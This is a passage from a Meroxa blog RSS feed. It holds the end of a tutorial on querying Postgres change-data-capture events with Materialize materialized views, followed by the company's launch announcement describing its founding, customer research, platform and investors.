&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;createdAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_createdAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;updatedAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_updatedAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;connector&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_connector&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;ts_ms&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_ts_ms&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;db&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_db&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;schema&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_schema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;table&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_table&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_snapshot&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;op&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;ts_ms&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; ts_ms&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;schema&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;schema&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt;::jsonb &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; val &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_stream&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Bjj-aBvZkZL5UfucgChjeQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Now, we can query this view as if it were a SQL table. Let’s say we wanted to see the counts of the different types of operations (inserts, updates, and deletes) occurring in Postgres. We can use the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;COUNT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;GROUP&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;BY&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*-92MwfgURvG61G0IEVbVJw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The nice thing is that because materialized views are composable, we can create another materialized view from queries of &lt;em&gt;other&lt;/em&gt; materialized views:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED &lt;span class=&quot;token keyword&quot;&gt;VIEW&lt;/span&gt; op_counts &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;COUNT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;GROUP&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;BY&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As our queries become more complex and our datasets grow, we can continue to create more and more views. They will all be lightning fast and updated in real time. A great way to see this speed in action is the &lt;a href=&quot;https://materialize.com/docs/katacoda/?intro-wikipedia&quot;&gt;Materialize Demo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Using &lt;code class=&quot;language-text&quot;&gt;watch&lt;/code&gt;, we can execute a query in &lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt; once per second, continuously:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*p0DcOgfBk__f2OfBDyJWBw.gif&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;watch&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-n1&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;psql -U materialize -h localhost -p 6875 materialize -c &quot;SELECT * FROM op_counts;&quot;&apos;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Now that you’ve built a pipeline to stream data from Meroxa to Materialize, you can continue to build your real-time streaming analytics stack. Here are a couple of other things you can do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Building more views: &lt;a href=&quot;https://materialize.com/docs/overview/what-is-materialize/#sql--views&quot;&gt;materialized views&lt;/a&gt; can be used to transform or even duplicate sources into Materialize.&lt;/li&gt;
&lt;li&gt;Adding additional sources: &lt;a href=&quot;https://docs.meroxa.com/docs/resource-types&quot;&gt;check out other sources&lt;/a&gt; in Meroxa (e.g., Elasticsearch). All can be streamed to Materialize using the same steps above.&lt;/li&gt;
&lt;/ul&gt;
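&lt;p&gt;To illustrate the first point, derived views can also filter the change stream. Here is a hypothetical sketch, assuming the &lt;code class=&quot;language-text&quot;&gt;user_cdc_table&lt;/code&gt; view created above (Debezium-style change events mark deletes with &lt;code class=&quot;language-text&quot;&gt;op = &apos;d&apos;&lt;/code&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- Hypothetical example: a materialized view of delete events only,
-- built on top of the user_cdc_table view from earlier.
CREATE MATERIALIZED VIEW user_deletes AS
SELECT ts_ms FROM user_cdc_table WHERE op = &apos;d&apos;;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;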
&lt;p&gt;I can’t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;For more information, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/katacoda/?intro-wikipedia&quot;&gt;Materialize Demo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/getting-started/setup&quot;&gt;Get Started with Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hello World, Meroxa Style.]]></title><description><![CDATA[“Data is the new oil.” If data is the new oil, we wanted to power the refinery. The merox process, but for data.]]></description><link>https://meroxa.com/blog/hello-world-meroxa-style</link><guid isPermaLink="false">https://meroxa.com/blog/hello-world-meroxa-style</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 13 Apr 2021 19:49:00 GMT</pubDate><content:encoded>&lt;p&gt;In early 2019, I was watching a documentary about the Dangote refinery being built in Nigeria. The narrator was describing the refining process for jet fuel and mentioned something like, “… and this is where the merox process kicks off, ensuring the jet fuel is free from impurities.”&lt;/p&gt;
&lt;p&gt;A light bulb went off.&lt;/p&gt;
&lt;p&gt;I spent years at Heroku and frequently heard Marc Benioff say, “Data is the new oil.” If data is the new oil, we wanted to power the refinery. The merox process, but for data.&lt;/p&gt;
&lt;p&gt;I met my cofounder Ali Hamidi at Heroku, where we both worked on the world’s best platform as a service. I remember the exact moment we realized we were kindred spirits on the same quest, and of course it started with Hacker News. After discussing the technical merits of yet another “revolutionary technology”, I remember us joking about how the data ecosystem was the wild west of well-marketed products that were just repackaged incremental improvements. For some reason, this time my snarkiness sparked a different twinkle in Ali’s eye. “Well, maybe we should do something about it.” Yes, Ali. We should.&lt;/p&gt;
&lt;p&gt;Ali and I grabbed a conference room at a coworking space. We discussed what was missing from the data ecosystem that could help data professionals be more productive. A couple hours later, we had a reference architecture for the initial platform offering. As we sat back and looked at all the scribbles on that whiteboard, I remember our collective excitement about the future and thinking, “now the real work begins.”&lt;/p&gt;
&lt;p&gt;Meroxa was born.&lt;/p&gt;
&lt;p&gt;With a little bit of pre-seed cash in the bank, we needed to talk to potential customers and clarify our ideal customer profile. Was what we were building a necessity or a nice-to-have? Before starting an accelerator program, I spent the next three months interviewing over one hundred people, including data engineers, data analysts, data scientists, and software engineers. It was crucial to understand the bottlenecks to their productivity. We asked them questions about the tools they used, what they liked or didn’t like about their current toolset, their workflow, and how they spent their time solving data issues for stakeholders. What we found was pretty shocking:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;65% of their time was spent on grunt work (data cleaning, integrating data components, maintaining pipelines) and 30% on ad hoc requests from stakeholders, leaving 5% for feature support.&lt;/li&gt;
&lt;li&gt;The average time to bring a data pipeline to production was between 3–6 months, despite most companies having dedicated data engineers on staff.&lt;/li&gt;
&lt;li&gt;They were armed to the teeth with different tools for different processes, which only complicated their jobs instead of making them easier.&lt;/li&gt;
&lt;li&gt;Most of the companies they worked for were making decisions based on data that was stale or inaccurate.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By delivering on the promise of a self-service platform that would reduce the amount of grunt work, we could unlock new levels of productivity and a whole new class of customer experiences powered by real-time data, in minutes, not months.&lt;/p&gt;
&lt;p&gt;Our belief at Meroxa is that anyone can be a data engineer if given the right toolset. In our customer research, it wasn’t uncommon to see engineers deploying 4+ commercial tools and a healthy heaping of open-source offerings to orchestrate data. Each of those tools/services has its own configuration profile and operational complexities, requiring the engineers to have deep &lt;em&gt;and&lt;/em&gt; broad knowledge. As you can imagine, maintenance is a nightmare anytime something goes wrong. Regardless of industry vertical or company size, the people we interviewed all had the same issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Maintaining real-time infrastructure using open source Kafka was a chore and the managed services are expensive.&lt;/li&gt;
&lt;li&gt;Commercial ELT and CDP solutions are rigid and don’t handle upstream schema changes well.&lt;/li&gt;
&lt;li&gt;Additional instrumentation was needed in their data infrastructure for observability, scaling, and incident triage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And each of the problems was centered around the same set of use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Desire to do real-time data warehouse sync for analytics and dashboard visualizations.&lt;/li&gt;
&lt;li&gt;Archival of raw records into a data lake for model training/active learning.&lt;/li&gt;
&lt;li&gt;Processing data in real-time to ensure it reaches the destination in the proper format, without introducing latency or complexity with external tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that knowledge, we built the Meroxa platform to help engineers control the fragmented data-services ecosystem and evolve the conversation from integration to orchestration.&lt;/p&gt;
&lt;p&gt;The platform consists of a change data capture service, schema registry, event streaming service, API proxy, and incident-automation framework that allows customers to transform and orchestrate data in real-time to multiple destinations. This is achieved without modifying application code or introducing performance overhead to your production data sources. Customers who previously spent millions of dollars building real-time data infrastructure over multiple years now have the ability to build production-ready pipelines in minutes using our CLI and dashboard.&lt;/p&gt;
&lt;p&gt;After months of design partnerships, pilots, proof of concepts, demos, and a closed developer preview, we are finally ready to unveil our self-service platform to the world. While we’ve put in a ton of hours, this moment would not be possible without the support of our incredible investors including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Nick Caldwell, Village Global, Adam Gross, Jason Warner, Deon Nicholas, Hustle Fund, and Fredrik Bjork who believed in us when we were just a deck and a dream.&lt;/li&gt;
&lt;li&gt;Root Ventures (Lee Edwards) &amp;#x26; Amplify Partners (Sarah Catanzaro &amp;#x26; Lenny Pruss) who co-led our seed round.&lt;/li&gt;
&lt;li&gt;Drive Capital (Andy Jenks &amp;#x26; Van Jones) who led our Series A.&lt;/li&gt;
&lt;li&gt;And a host of other strategic angels, institutional investors, and scouts including Menlo, Index, Kleiner, Addition, Sequoia, Meritech, Calvin French-Owen, Chris Riccomini, Kelvin Beachum, Tokyo Black (Looker co-founders), and more…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Having raised $19.2M between our Seed and Series A, we’ve assembled one of the best teams to deliver a best-in-class platform and developer experience for our customers.&lt;/p&gt;
&lt;p&gt;Today Meroxa takes off.&lt;/p&gt;
&lt;p&gt;If you’re excited, we invite you to sign up and get access to our platform at &lt;a href=&quot;https://meroxa.com/&quot;&gt;meroxa.com&lt;/a&gt;. No sales calls or solution architects needed. Just plain old productivity in minutes. We’re excited to see what you build next.&lt;/p&gt;
&lt;p&gt;DeVaris Brown&lt;br&gt;
CEO, Meroxa&lt;/p&gt;</content:encoded></item></channel></rss>